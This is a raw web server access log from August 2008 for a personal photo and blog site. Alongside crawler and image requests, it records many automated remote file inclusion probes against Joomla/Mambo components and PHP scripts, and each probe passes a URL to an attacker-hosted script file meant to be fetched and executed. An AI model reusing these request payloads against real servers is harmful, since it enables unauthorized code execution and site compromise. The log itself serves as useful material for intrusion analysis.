65.55.211.40 - - [28/Aug/2008:10:42:50 -0700] "GET /megumi/minamigrad2k8/IMG_1698.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [28/Aug/2008:10:42:50 -0700] "GET /megumi/minamigrad2k8/IMG_1709.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [28/Aug/2008:10:42:50 -0700] "GET /megumi/minamigrad2k8/IMG_1661.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [28/Aug/2008:10:42:50 -0700] "GET /megumi/minamigrad2k8/IMG_1597.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [28/Aug/2008:10:42:51 -0700] "GET /megumi/minamigrad2k8/IMG_1636.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:10:42:54 -0700] "GET /logs/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62571 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:42:56 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:42:57 -0700] "GET /send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:42:58 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:43:06 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:43:19 -0700] "GET /errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:43:24 -0700] "GET /logs/access_080224.log/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:43:24 -0700] "GET /logs/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:10:43:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:10:43:33 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.192.98 - - [28/Aug/2008:10:44:04 -0700] "GET /logs/access_080718.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.179.155 - - [28/Aug/2008:10:44:27 -0700] "GET /logs/?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 62571 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.169.179.155 - - [28/Aug/2008:10:44:28 -0700] "GET /?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 85123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:10:45:01 -0700] "GET /logs/access_080715.log/test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:45:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0024.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:45:25 -0700] "GET /logs/access_080118.log/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:45:28 -0700] "GET /logs/access_080413.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:45:28 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:45:28 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:45:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:45:34 -0700] "GET /logs/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [28/Aug/2008:10:45:37 -0700] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 2958332 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:10:46:46 -0700] "GET /logs/access_080715.log//trans/trans.php?trans=&p=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:10:46:46 -0700] "GET //trans/trans.php?trans=&p=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:10:46:47 -0700] "GET /logs//trans/trans.php?trans=&p=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:10:46:49 -0700] "GET /logs/access_080504.log//trans/trans.php?trans=&p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:10:46:49 -0700] "GET /logs//trans/trans.php?trans=&p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:10:46:50 -0700] "GET //trans/trans.php?trans=&p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:10:46:50 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=&p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.213.30 - - [28/Aug/2008:10:47:05 -0700] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:47:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0070.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:47:31 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:47:31 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:47:37 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:47:37 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:47:44 -0700] "GET /logs/access_080428.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:47:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0112.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.55.213.30 - - [28/Aug/2008:10:48:12 -0700] "GET /minamijewelry/minami_sitebg_lightsand.jpg HTTP/1.0" 200 33318 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.137.192.222 - - [28/Aug/2008:10:48:47 -0700] "GET /logs/?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 62571 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
83.137.192.222 - - [28/Aug/2008:10:48:49 -0700] "GET /?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 85139 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:10:49:28 -0700] "GET /logs/access_080804.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:49:38 -0700] "GET /logs/access_080402.log//crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:49:38 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:49:46 -0700] "GET /logs/access_080417.log//crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:49:50 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:49:50 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:49:51 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.152.151 - - [28/Aug/2008:10:49:52 -0700] "GET /errors.php?error=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.103.152.151 - - [28/Aug/2008:10:49:52 -0700] "GET /logs/errors.php?error=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:10:50:28 -0700] "GET /logs/access_080307.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:50:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-030.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
87.230.81.72 - - [28/Aug/2008:10:50:37 -0700] "GET /logs/access_080610.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:50:53 -0700] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:50:53 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:50:54 -0700] "GET /logs/access_080402.log//crontab/run_billing.php?config[include_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:51:09 -0700] "GET /logs/access_080621.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.31 - - [28/Aug/2008:10:51:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.31 - - [28/Aug/2008:10:51:27 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.1" 200 7196 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:51:46 -0700] "GET /logs/access_080121.log/errors.php?error=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:51:46 -0700] "GET /logs/errors.php?error=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:51:46 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:51:46 -0700] "GET /logs/access_080628.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:51:46 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:51:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0168.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:51:51 -0700] "GET /logs/access_080404.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:51:52 -0700] "GET /logs/access_071222.log/errors.php?error=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:52:03 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:52:03 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:52:03 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:52:06 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:52:06 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:52:12 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:52:12 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:52:12 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:10:52:15 -0700] "GET /logs/access_080211.log//includes/config.php?relative_script_path=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:10:52:15 -0700] "GET //includes/config.php?relative_script_path=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [28/Aug/2008:10:52:15 -0700] "GET /logs//includes/config.php?relative_script_path=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:52:21 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.93.99.64 - - [28/Aug/2008:10:52:25 -0700] "GET /logs/access_080621.log//admin/editor2/spaw_control.class.php?spaw_root=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:52:36 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:53:09 -0700] "GET /logs/access_080510.log//components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:53:27 -0700] "GET /logs/access_080803.log/index.php?url=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:53:29 -0700] "GET /index.php?url=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 200 85067 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:53:30 -0700] "GET /logs/index.php?url=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:53:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_4.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:53:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0157.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
207.210.89.58 - - [28/Aug/2008:10:53:55 -0700] "GET /logs/access_080730.log//trans/trans.php?trans=&p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:54:02 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:54:02 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:54:24 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.218.170.130 - - [28/Aug/2008:10:54:40 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.218.170.130 - - [28/Aug/2008:10:54:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:54:53 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:54:53 -0700] "GET /errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:54:53 -0700] "GET /logs/errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:55:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:55:25 -0700] "GET /logs/errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:55:25 -0700] "GET /errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:55:31 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:55:44 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:55:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:55:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:55:45 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:56:05 -0700] "GET /logs/access_080113.log/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:56:17 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:56:17 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
